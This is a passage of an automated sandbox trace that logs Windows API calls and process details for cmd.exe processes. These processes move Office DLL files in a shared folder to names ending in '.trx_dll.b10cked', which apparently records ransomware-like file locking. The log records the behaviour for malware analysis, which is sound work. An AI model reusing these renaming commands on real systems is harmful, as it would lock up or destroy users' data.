lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.REST.trx_dll.b10cked", lpFilePart=0x0) returned 0x4b [0172.488] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.REST.trx_dll", nBufferLength=0x104, lpBuffer=0x20ee3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.REST.trx_dll", lpFilePart=0x0) returned 0x43 [0172.488] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\onintl.rest.trx_dll")) returned 0x2020 [0172.488] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\onintl.rest.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ONINTL.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\onintl.rest.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0172.489] FindClose (in: hFindFile=0x342130 | out: hFindFile=0x342130) returned 1 [0172.489] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x20edf0 | out: _Buffer=" 1") returned 9 [0172.489] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.489] GetFileType (hFile=0x7) returned 0x2 [0172.489] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0172.489] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20ed7c | out: lpMode=0x20ed7c) returned 1 [0172.489] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.489] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20edb0 | out: lpConsoleScreenBufferInfo=0x20edb0) returned 1 [0172.489] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0172.490] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x20edf0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0172.490] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x20edd4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x20edd4*=0x1a) returned 1 [0172.490] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.490] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0172.490] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.490] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0172.491] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.491] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0172.491] SetConsoleInputExeNameW () returned 0x1 [0172.491] GetConsoleOutputCP () returned 0x1b5 [0172.491] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.491] SetThreadUILanguage (LangId=0x0) returned 0x409 [0172.491] exit (_Code=0) Process: id = "293" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16760" os_pid = "0x4b0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22952 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22953 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22954 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22955 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 22956 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22957 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22958 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22959 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22960 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 22961 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 23501 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 23502 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 23503 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 23504 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 23505 start_va = 0x470000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 23506 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 23507 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 23508 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 23509 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 23510 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 23511 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 23512 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 23513 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 23514 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 23515 start_va = 0x360000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 23516 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 23517 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 23518 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 23519 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 23520 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 23521 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 23522 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 23523 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 23524 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Thread: id = 361 os_tid = 0x808 [0172.354] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14f90c | out: lpSystemTimeAsFileTime=0x14f90c*(dwLowDateTime=0x9ca07880, dwHighDateTime=0x1d440a9)) [0172.354] GetCurrentProcessId () returned 0x4b0 [0172.354] GetCurrentThreadId () returned 0x808 [0172.354] GetTickCount () returned 0x323b5 [0172.354] QueryPerformanceCounter (in: lpPerformanceCount=0x14f904 | out: lpPerformanceCount=0x14f904*=22914359197) returned 1 [0172.355] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0172.355] __set_app_type (_Type=0x1) [0172.355] __p__fmode () returned 0x76b331f4 [0172.355] __p__commode () returned 0x76b331fc [0172.355] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0172.356] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0172.356] GetCurrentThreadId () returned 0x808 [0172.356] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x808) returned 0x38 [0172.356] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0172.356] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0172.356] SetThreadUILanguage (LangId=0x0) returned 0x409 [0172.356] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0172.356] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14f89c | out: phkResult=0x14f89c*=0x0) returned 0x2 [0172.356] VirtualQuery (in: lpAddress=0x14f8d3, lpBuffer=0x14f86c, dwLength=0x1c | out: lpBuffer=0x14f86c*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.356] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14f86c, dwLength=0x1c | out: lpBuffer=0x14f86c*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0172.356] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14f86c, dwLength=0x1c | out: lpBuffer=0x14f86c*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0172.356] VirtualQuery (in: lpAddress=0x53000, lpBuffer=0x14f86c, dwLength=0x1c | out: lpBuffer=0x14f86c*(BaseAddress=0x53000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.356] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14f86c, dwLength=0x1c | out: lpBuffer=0x14f86c*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0172.359] GetConsoleOutputCP () returned 0x1b5 [0172.359] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.359] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0172.359] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.359] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0172.360] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.360] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0172.360] _get_osfhandle (_FileHandle=1) returned 0x7 [0172.360] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0172.360] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.360] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0172.360] _get_osfhandle (_FileHandle=0) returned 0x3 [0172.360] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0172.360] GetEnvironmentStringsW () returned 0x270210* [0172.361] FreeEnvironmentStringsW (penv=0x270210) returned 1 [0172.361] GetEnvironmentStringsW () returned 0x270210* [0172.361] FreeEnvironmentStringsW (penv=0x270210) returned 1 [0172.361] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e80c | out: phkResult=0x14e80c*=0x40) returned 0x0 [0172.361] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e814, lpData=0x14e818, lpcbData=0x14e810*=0x1000 | out: lpType=0x14e814*=0x0, lpData=0x14e818*=0xa0, lpcbData=0x14e810*=0x1000) returned 0x2 [0172.361] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e814, lpData=0x14e818, lpcbData=0x14e810*=0x1000 | out: lpType=0x14e814*=0x4, lpData=0x14e818*=0x1, lpcbData=0x14e810*=0x4) returned 0x0 [0172.361] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e814, lpData=0x14e818, lpcbData=0x14e810*=0x1000 | out: lpType=0x14e814*=0x0, lpData=0x14e818*=0x1, lpcbData=0x14e810*=0x1000) returned 0x2 [0172.361] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e814, lpData=0x14e818, lpcbData=0x14e810*=0x1000 | out: lpType=0x14e814*=0x4, lpData=0x14e818*=0x0, lpcbData=0x14e810*=0x4) returned 0x0 [0172.361] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e814, lpData=0x14e818, lpcbData=0x14e810*=0x1000 | out: lpType=0x14e814*=0x4, lpData=0x14e818*=0x40, lpcbData=0x14e810*=0x4) returned 0x0 [0172.361] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e814, lpData=0x14e818, lpcbData=0x14e810*=0x1000 | out: lpType=0x14e814*=0x4, lpData=0x14e818*=0x40, lpcbData=0x14e810*=0x4) returned 0x0 [0172.361] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e814, lpData=0x14e818, lpcbData=0x14e810*=0x1000 | out: lpType=0x14e814*=0x0, lpData=0x14e818*=0x40, lpcbData=0x14e810*=0x1000) returned 0x2 [0172.361] RegCloseKey (hKey=0x40) returned 0x0 [0172.361] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e80c | out: phkResult=0x14e80c*=0x40) returned 0x0 [0172.362] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e814, lpData=0x14e818, lpcbData=0x14e810*=0x1000 | out: lpType=0x14e814*=0x0, lpData=0x14e818*=0x40, lpcbData=0x14e810*=0x1000) returned 0x2 [0172.362] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e814, lpData=0x14e818, lpcbData=0x14e810*=0x1000 | out: lpType=0x14e814*=0x4, lpData=0x14e818*=0x1, lpcbData=0x14e810*=0x4) returned 0x0 [0172.362] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e814, lpData=0x14e818, lpcbData=0x14e810*=0x1000 | out: lpType=0x14e814*=0x0, lpData=0x14e818*=0x1, lpcbData=0x14e810*=0x1000) returned 0x2 [0172.362] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e814, lpData=0x14e818, lpcbData=0x14e810*=0x1000 | out: lpType=0x14e814*=0x4, lpData=0x14e818*=0x0, lpcbData=0x14e810*=0x4) returned 0x0 [0172.362] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e814, lpData=0x14e818, lpcbData=0x14e810*=0x1000 | out: lpType=0x14e814*=0x4, lpData=0x14e818*=0x9, lpcbData=0x14e810*=0x4) returned 0x0 [0172.362] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e814, lpData=0x14e818, lpcbData=0x14e810*=0x1000 | out: lpType=0x14e814*=0x4, lpData=0x14e818*=0x9, lpcbData=0x14e810*=0x4) returned 0x0 [0172.362] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e814, lpData=0x14e818, lpcbData=0x14e810*=0x1000 | out: lpType=0x14e814*=0x0, lpData=0x14e818*=0x9, lpcbData=0x14e810*=0x1000) returned 0x2 [0172.362] RegCloseKey (hKey=0x40) returned 0x0 [0172.362] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886388 [0172.362] srand (_Seed=0x5b886388) [0172.362] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.DLL.trx_dll.b10cked\"" [0172.362] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLI~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLLIBR.DLL.trx_dll.b10cked\"" [0172.362] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.362] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x271970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0172.363] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0172.363] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0172.363] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0172.363] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0172.363] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0172.363] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0172.363] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0172.363] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0172.363] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0172.363] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0172.363] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0172.363] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0172.363] GetEnvironmentStringsW () returned 0x272360* [0172.363] FreeEnvironmentStringsW (penv=0x272360) returned 1 [0172.363] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.363] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0172.363] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0172.363] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0172.363] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0172.363] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0172.364] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0172.364] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0172.364] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0172.364] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0172.364] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14f5d8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.364] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x14f5d8, lpFilePart=0x14f5d4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14f5d4*="Desktop") returned 0x18 [0172.364] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0172.364] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f354 | out: lpFindFileData=0x14f354) returned 0x2709f0 [0172.364] FindClose (in: hFindFile=0x2709f0 | out: hFindFile=0x2709f0) returned 1 [0172.364] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x14f354 | out: lpFindFileData=0x14f354) returned 0x2709f0 [0172.364] FindClose (in: hFindFile=0x2709f0 | out: hFindFile=0x2709f0) returned 1 [0172.364] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x14f354 | out: lpFindFileData=0x14f354) returned 0x2709f0 [0172.365] FindClose (in: hFindFile=0x2709f0 | out: hFindFile=0x2709f0) returned 1 [0172.365] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0172.365] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0172.365] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0172.365] GetEnvironmentStringsW () returned 0x270210* [0172.365] FreeEnvironmentStringsW (penv=0x270210) returned 1 [0172.365] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0172.366] GetConsoleOutputCP () returned 0x1b5 [0172.366] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0172.366] GetUserDefaultLCID () returned 0x409 [0172.366] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0172.366] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14f718, cchData=128 | out: lpLCData="0") returned 2 [0172.366] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14f718, cchData=128 | out: lpLCData="0") returned 2 [0172.366] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14f718, cchData=128 | out: lpLCData="1") returned 2 [0172.366] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0172.366] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0172.366] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0172.367] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0172.367] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0172.367] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0172.367] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0172.367] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0172.367] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0172.367] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0172.367] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0172.368] GetConsoleTitleW (in: lpConsoleTitle=0x260930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.368] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0172.368] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0172.368] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0172.368] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0172.369] _wcsicmp (_String1="move", _String2=")") returned 68 [0172.369] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0172.369] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0172.369] _wcsicmp (_String1="IF", _String2="move") returned -4 [0172.369] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0172.369] _wcsicmp (_String1="REM", _String2="move") returned 5 [0172.369] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0172.373] GetConsoleTitleW (in: lpConsoleTitle=0x14f410, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.530] _wcsicmp (_String1="move", 